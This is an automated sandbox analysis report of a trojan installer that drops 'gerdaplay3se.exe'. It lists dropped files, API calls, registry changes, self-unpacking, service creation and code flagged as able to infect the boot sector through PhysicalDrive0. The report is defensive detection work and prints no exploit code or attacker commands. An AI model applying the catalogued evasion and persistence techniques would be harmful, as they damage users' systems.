Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: is-UG21C.tmp.1.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: is-N5JHT.tmp.1.dr, is-REN2E.tmp.1.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: is-UG21C.tmp.1.dr	String found in binary or memory: https://www.openssl.org/H

System Summary

PE file has a writeable .text section

Source: gerdaplay3se.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Eclipse IO Library 9.27.43.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0042F594 NtdllDefWindowProc_A,	1_2_0042F594
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00423B94 NtdllDefWindowProc_A,	1_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004125E8 NtdllDefWindowProc_A,	1_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00478EFC NtdllDefWindowProc_A,	1_2_00478EFC
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045763C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,	1_2_0045763C

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

1_2_0042E944

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040840C	0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004708A0	1_2_004708A0
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00480E7E	1_2_00480E7E
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0043533C	1_2_0043533C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0046744C	1_2_0046744C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00488014	1_2_00488014
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004303D0	1_2_004303D0
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0048E4AC	1_2_0048E4AC
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0044453C	1_2_0044453C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00434638	1_2_00434638
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00444AE4	1_2_00444AE4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00430F5C	1_2_00430F5C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004870B4	1_2_004870B4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045F16C	1_2_0045F16C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004451DC	1_2_004451DC
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045B21C	1_2_0045B21C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004694C8	1_2_004694C8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004455E8	1_2_004455E8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00451A30	1_2_00451A30
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0043DDC4	1_2_0043DDC4
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_00401051	3_2_00401051
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_00401C26	3_2_00401C26
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D9BCEB	3_2_02D9BCEB
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D9B4E5	3_2_02D9B4E5
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D9BD58	3_2_02D9BD58
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D9B950	3_2_02D9B950
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D853A0	3_2_02D853A0
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D7E18D	3_2_02D7E18D
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D79E84	3_2_02D79E84
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D84E29	3_2_02D84E29
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D6EFB1	3_2_02D6EFB1
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D7DC99	3_2_02D7DC99
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D78442	3_2_02D78442
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D7AC3A	3_2_02D7AC3A
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D82DB4	3_2_02D82DB4
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: 3_2_02D7E5A5	3_2_02D7E5A5

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: String function: 02D85330 appears 139 times
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: String function: 02D78AE0 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00408C1C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00406AD4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 0040596C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00407904 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00445E48 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00457FC4 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00457DB8 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00434550 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 004533B8 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00446118 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: String function: 00403684 appears 227 times

Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-GKUSE.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-GKUSE.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-GKUSE.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: is-3CJHL.tmp.1.dr

Static PE information: Number of sections : 11 > 10

Source: file.exe, 00000000.00000003.2109779269.0000000002310000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.2109905265.00000000020E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/26@2/2

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_02D708B8 FormatMessageA,GetLastError,

3_2_02D708B8

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045568C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		1_2_0045568C

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00455EB4 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

1_2_00455EB4

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_0040270C

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_0046E1E4 GetVersion,CoCreateInstance,

1_2_0046E1E4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource,

0_2_00409C34

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_0040254E StartServiceCtrlDispatcherA,

3_2_0040254E

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Code function: 3_2_0040254E StartServiceCtrlDispatcherA,

3_2_0040254E

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: file.exe	String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: file.exe	String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Process created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: dsound.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 3298104 > 1048576

Source:	Binary string: msvcp71.pdbx# source: is-RDVP8.tmp.1.dr
Source:	Binary string: msvcr71.pdb< source: is-8SV2U.tmp.1.dr
Source:	Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-UG21C.tmp.1.dr
Source:	Binary string: msvcp71.pdb source: is-RDVP8.tmp.1.dr
Source:	Binary string: msvcr71.pdb source: is-8SV2U.tmp.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Unpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Unpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp

Code function: 1_2_00450334 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00450334

Source: is-3CJHL.tmp.1.dr

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004065C8 push 00406605h; ret	0_2_004065FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax	0_2_00408109
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F38 push 00408F6Bh; ret	0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0048446C push 0048457Ah; ret	1_2_00484572
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040995C push 00409999h; ret	1_2_00409991
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00458060 push 00458098h; ret	1_2_00458090
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004062C4 push ecx; mov dword ptr [esp], eax	1_2_004062C5
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004104F0 push ecx; mov dword ptr [esp], edx	1_2_004104F5
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00412938 push 0041299Bh; ret	1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0049AD30 pushad ; retf	1_2_0049AD3F
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040CE48 push ecx; mov dword ptr [esp], edx	1_2_0040CE4A
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00459378 push 004593BCh; ret	1_2_004593B4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00495384 push ecx; mov dword ptr [esp], ecx	1_2_00495389
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040F3A8 push ecx; mov dword ptr [esp], edx	1_2_0040F3AA
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004434B4 push ecx; mov dword ptr [esp], ecx	1_2_004434B8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045186C push 0045189Fh; ret	1_2_00451897
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00451A30 push ecx; mov dword ptr [esp], eax	1_2_00451A35
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00485B5C push ecx; mov dword ptr [esp], ecx	1_2_00485B61
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00419C38 push ecx; mov dword ptr [esp], ecx	1_2_00419C3D
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045FDC4 push ecx; mov dword ptr [esp], ecx	1_2_0045FDC8

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		3_2_00401A4F
Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		3_2_02D6F7DA

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-N5JHT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-8SV2U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\uninstall\is-GKUSE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\is-REN2E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\ssleay32.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Jump to dropped file
